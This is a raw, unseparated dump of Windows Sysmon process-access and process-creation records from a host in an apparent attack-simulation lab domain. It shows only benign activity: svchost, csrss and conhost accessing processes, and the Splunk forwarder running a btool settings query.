13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B900-00000000A301}11881200C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.682{59A5CD1D-8EE3-6005-BA00-00000000A301}1372C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000003672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B800-00000000A301}11321196C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.675{59A5CD1D-8EE3-6005-B900-00000000A301}1188C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B800-00000000A301}1132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.670{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 